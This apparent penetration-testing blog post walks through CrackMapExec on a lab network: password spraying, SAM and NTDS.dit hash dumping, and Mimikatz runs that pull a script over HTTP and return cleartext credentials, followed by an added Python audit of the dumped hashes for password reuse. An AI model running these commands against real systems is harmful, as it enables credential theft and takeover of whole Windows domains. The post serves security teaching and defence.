We’ve talked about using WMI to execute commands remotely, instead of using PSEXEC. We even released a script that will automate obtaining a Meterpreter shell through WMI calls.
I’ve recently stumbled upon a script that includes all of these functions and more, and it has become my favorite post-exploitation tool. It is multi-threaded, uses no local binaries and no dropper binaries, and provides a plethora of functionality for escalating privileges across the network, all through WMI calls. The tool is CrackMapExec, written by byt3bl33d3r.
Imagine that we’ve compromised a set of credentials on an internal assessment. CrackMapExec can easily be used to find where those credentials hold elevated privileges. This command uses 100 threads to attempt a login to every system in the 192.168.81.0/24 range:
[/opt/CrackMapExec] # ./crackmapexec.py -u TrustedSec -p Password123 -d workgroup -t 100 192.168.81.0/24
03-08-2016 12:34:29 SMB 192.168.81.10:445 PWNT-DC [*] Windows 6.1 Build 7601 (name:PWNT-DC) (domain:workgroup)
03-08-2016 12:34:29 SMB 192.168.81.10:445 PWNT-DC [-] workgroup\TrustedSec:Password123 SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)
03-08-2016 12:34:35 SMB 192.168.81.216:445 WIN7-SPOONMAN [*] Windows 6.1 Build 7601 (name:WIN7-SPOONMAN) (domain:workgroup)
03-08-2016 12:34:35 SMB 192.168.81.219:445 WIN8-SPOONMAN [*] Windows 10.0 Build 10586 (name:WIN8-SPOONMAN) (domain:workgroup)
03-08-2016 12:34:35 SMB 192.168.81.216:445 WIN7-SPOONMAN [+] Login successful workgroup\TrustedSec:Password123
03-08-2016 12:34:35 SMB 192.168.81.219:445 WIN8-SPOONMAN [-] workgroup\TrustedSec:Password123 SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)

Once we find administrative access on one system, we can dump its local SAM hashes, which may then be usable in a pass-the-hash attack against other systems on the network:
[/opt/CrackMapExec] # ./crackmapexec.py -u TrustedSec -p Password123 -d workgroup 192.168.81.216 --sam
03-08-2016 12:39:54 SMB 192.168.81.216:445 WIN7-SPOONMAN [*] Windows 6.1 Build 7601 (name:WIN7-SPOONMAN) (domain:workgroup)
03-08-2016 12:39:54 SMB 192.168.81.216:445 WIN7-SPOONMAN [+] Login successful workgroup\TrustedSec:Password123
03-08-2016 12:39:55 SMB 192.168.81.216:445 WIN7-SPOONMAN [+] Dumping SAM hashes (uid:rid:lmhash:nthash)
03-08-2016 12:39:55 SMB 192.168.81.216:445 WIN7-SPOONMAN Administrator:500:aad3b435b51404eeaad3b435b51404ee:bc23a1506bd3c8d3a533680c516bab27:::
03-08-2016 12:39:55 SMB 192.168.81.216:445 WIN7-SPOONMAN Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
03-08-2016 12:39:56 SMB 192.168.81.216:445 WIN7-SPOONMAN TrustedSec:1001:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
03-08-2016 12:39:56 SMB 192.168.81.216:445 WIN7-SPOONMAN ASPNET:1005:aad3b435b51404eeaad3b435b51404ee:e8dfb6d1552e2fc23a66e8d573abbdba:::
03-08-2016 12:39:56 SMB 192.168.81.216:445 WIN7-SPOONMAN HomeGroupUser$:1007:aad3b435b51404eeaad3b435b51404ee:46e6eeed8d95245e068dfbec8a81ef40:::
03-08-2016 12:39:56 SMB 192.168.81.216:445 WIN7-SPOONMAN TrustedUser:1012:aad3b435b51404eeaad3b435b51404ee:dea92d9004d55c23189754069eeec7fc:::

We can also scrape clear text credentials from memory:
[/opt/CrackMapExec] # ./crackmapexec.py -u TrustedSec -p Password123 -d workgroup 192.168.81.216 --mimikatz
03-08-2016 12:40:54 SMB 192.168.81.216:445 WIN7-SPOONMAN [*] Windows 6.1 Build 7601 (name:WIN7-SPOONMAN) (domain:workgroup)
03-08-2016 12:40:55 SMB 192.168.81.216:445 WIN7-SPOONMAN [+] Login successful workgroup\TrustedSec:Password123
03-08-2016 12:40:56 SMB 192.168.81.216:445 WIN7-SPOONMAN [+] Executed command via WMIEXEC
03-08-2016 12:40:59 192.168.81.216 - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 -
03-08-2016 12:41:04 192.168.81.216 - - "POST / HTTP/1.1" 200 -
03-08-2016 12:41:04 PARSER 192.168.81.216:1138 [+] Found plain text credentials (domain\user:password)
03-08-2016 12:41:04 PARSER 192.168.81.216:1138 PWNT\TrustedSec:GoatBah1!
03-08-2016 12:41:04 PARSER 192.168.81.216:1138 PWNT\WIN7-SPOONMAN$:%Xa4Qt*Qbq\I3N-DdW?@btkdv1-]JK<AQ@I;k`K4e, 2"Q,(%NZy@hfQy^q"q;<L+ubiD7"np;=T#c<\]\]criYyy[(nE y6(Ra;as[Z-Sti-pbm;
03-08-2016 12:41:04 PARSER 192.168.81.216:1138 PWNT\WIN7-SPOONMAN$:%Xa4Qt*Qbq\I3N-DdW?@btkdv1-]JK<AQ@I;k`K4e, 2"Q,(%NZy@hfQy^q"q;<L+ubiD7"np;=T#c<\]\]criYyy[(nE y6(Ra;as[Z-Sti-pbm;
03-08-2016 12:41:04 PARSER 192.168.81.216:1138 [*] Saved Mimikatz's output to Mimikatz-192.168.81.216-2016-03-08_124104.log

Notice that all results are logged to the ./logs directory. Mimikatz has given us the password of a member of the “Domain Admins” group, so let's retrieve the hashes safely from NTDS.dit on the domain controller:
[/opt/CrackMapExec] # ./crackmapexec.py -u TrustedSec -p GoatBah1! -d pwnt.com 192.168.81.10 --ntds drsuapi
03-08-2016 12:43:45 SMB 192.168.81.10:445 PWNT-DC [*] Windows 6.1 Build 7601 (name:PWNT-DC) (domain:pwnt.com)
03-08-2016 12:43:46 SMB 192.168.81.10:445 PWNT-DC [+] Login successful pwnt.com\TrustedSec:GoatBah1!
03-08-2016 12:43:46 SMB 192.168.81.10:445 PWNT-DC [+] Dumping NTDS.dit secrets using the DRSUAPI method (domain\uid:rid:lmhash:nthash)
03-08-2016 12:43:46 SMB 192.168.81.10:445 PWNT-DC Administrator:500:aad3b435b51404eeaad3b435b51404ee:918d38906649503fde8a641dbd87d857:::
03-08-2016 12:43:46 SMB 192.168.81.10:445 PWNT-DC Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
03-08-2016 12:43:46 SMB 192.168.81.10:445 PWNT-DC krbtgt:502:aad3b435b51404eeaad3b435b51404ee:903cd15bd70bbd6f4517ad01eeccbe15:::
03-08-2016 12:43:46 SMB 192.168.81.10:445 PWNT-DC TrustedSec:1000:aad3b435b51404eeaad3b435b51404ee:918d38906649503fde8a641dbd87d857:::
03-08-2016 12:43:46 SMB 192.168.81.10:445 PWNT-DC pwnt.com\testuser:1104:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
03-08-2016 12:43:46 SMB 192.168.81.10:445 PWNT-DC PWNT-DC$:1001:aad3b435b51404eeaad3b435b51404ee:07a60a315af67d202aa52e846ee4fb27:::
03-08-2016 12:43:46 SMB 192.168.81.10:445 PWNT-DC TEST$:1105:aad3b435b51404eeaad3b435b51404ee:4ab69c349bfaa599b46069f3d57dbe49:::
03-08-2016 12:43:46 SMB 192.168.81.10:445 PWNT-DC TEST2$:1106:aad3b435b51404eeaad3b435b51404ee:3ce8a48ae2264366c6c0ce9b6155bab6:::
03-08-2016 12:43:46 SMB 192.168.81.10:445 PWNT-DC WIN7-SPOONMAN$:1109:aad3b435b51404eeaad3b435b51404ee:63c459c139c5bdeb4c404327261d75f1:::

These are just a couple of examples, but there is so much more functionality packed into this script. So check it out! Thanks byt3bl33d3r!
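The dumps above show why the hashes were worth collecting: on PWNT-DC the Administrator and TrustedSec accounts carry the same NT hash, and the domain account testuser shares its NT hash with the local TrustedSec account on WIN7-SPOONMAN. That reuse is exactly what makes a hash lifted from one box replayable against another. As an added example (not from the post and not part of CrackMapExec), here is the audit a defender can run over the same uid:rid:lmhash:nthash lines after a sanctioned dump of their own SAM or NTDS.dit: it flags blank passwords, any LM hash still being stored, and NT hashes shared across accounts or hosts. The input is the post's own output, tagged with the host each line was dumped from; the host tagging and the HOST\user naming are this example's convention.

```python
"""Audit SAM / NTDS dump lines (user:rid:lmhash:nthash:::) for credential-hygiene problems.

Added example, not from the original post or from CrackMapExec. It reports
accounts with a blank password, accounts that still store an LM hash, and the
same NT hash reused across accounts or hosts.
"""
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of the empty string (LM storage disabled)
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty string (blank password)

# Input lines taken from the post's output, paired with the host they were dumped from.
SAMPLE_DUMP = [
    ("WIN7-SPOONMAN", "Administrator:500:aad3b435b51404eeaad3b435b51404ee:bc23a1506bd3c8d3a533680c516bab27:::"),
    ("WIN7-SPOONMAN", "Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::"),
    ("WIN7-SPOONMAN", "TrustedSec:1001:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::"),
    ("PWNT-DC", "Administrator:500:aad3b435b51404eeaad3b435b51404ee:918d38906649503fde8a641dbd87d857:::"),
    ("PWNT-DC", "Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::"),
    ("PWNT-DC", "krbtgt:502:aad3b435b51404eeaad3b435b51404ee:903cd15bd70bbd6f4517ad01eeccbe15:::"),
    ("PWNT-DC", "TrustedSec:1000:aad3b435b51404eeaad3b435b51404ee:918d38906649503fde8a641dbd87d857:::"),
    ("PWNT-DC", "pwnt.com\\testuser:1104:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::"),
]


def parse_pwdump_line(line):
    """Split 'user:rid:lmhash:nthash:::' into a dict; trailing empty fields are ignored."""
    fields = line.strip().split(":")
    if len(fields) < 4:
        raise ValueError(f"not a pwdump line: {line!r}")
    user, rid, lm, nt = fields[:4]
    return {"user": user, "rid": int(rid), "lm": lm.lower(), "nt": nt.lower()}


def audit_hashes(dump):
    """Return a list of (finding, [accounts]) tuples; accounts are written HOST\\user."""
    findings = []
    by_nt = defaultdict(list)  # NT hash -> accounts that carry it
    for host, line in dump:
        rec = parse_pwdump_line(line)
        acct = f"{host}\\{rec['user']}"
        if rec["nt"] == EMPTY_NT:
            findings.append(("blank_password", [acct]))
        if rec["lm"] != EMPTY_LM:
            findings.append(("lm_hash_stored", [acct]))
        by_nt[rec["nt"]].append(acct)
    for nt, accts in by_nt.items():
        # Blank passwords were reported above. Any other NT hash appearing on two
        # accounts means those accounts share a password, whatever their names.
        if nt != EMPTY_NT and len(accts) > 1:
            findings.append(("shared_password", sorted(accts)))
    return findings


if __name__ == "__main__":
    for kind, accts in audit_hashes(SAMPLE_DUMP):
        print(f"{kind:16} {', '.join(accts)}")
```

Run against the post's data this reports the two Guest accounts as blank (they are normally disabled, so join the output against account status before acting on it), the Administrator/TrustedSec pair on PWNT-DC, and the testuser/TrustedSec pair spanning the domain controller and the workstation. The last two are the findings to fix first: a built-in administrator sharing a password with a user account, and a domain account sharing one with a local account on a member machine, each turn a single compromised host into the whole network.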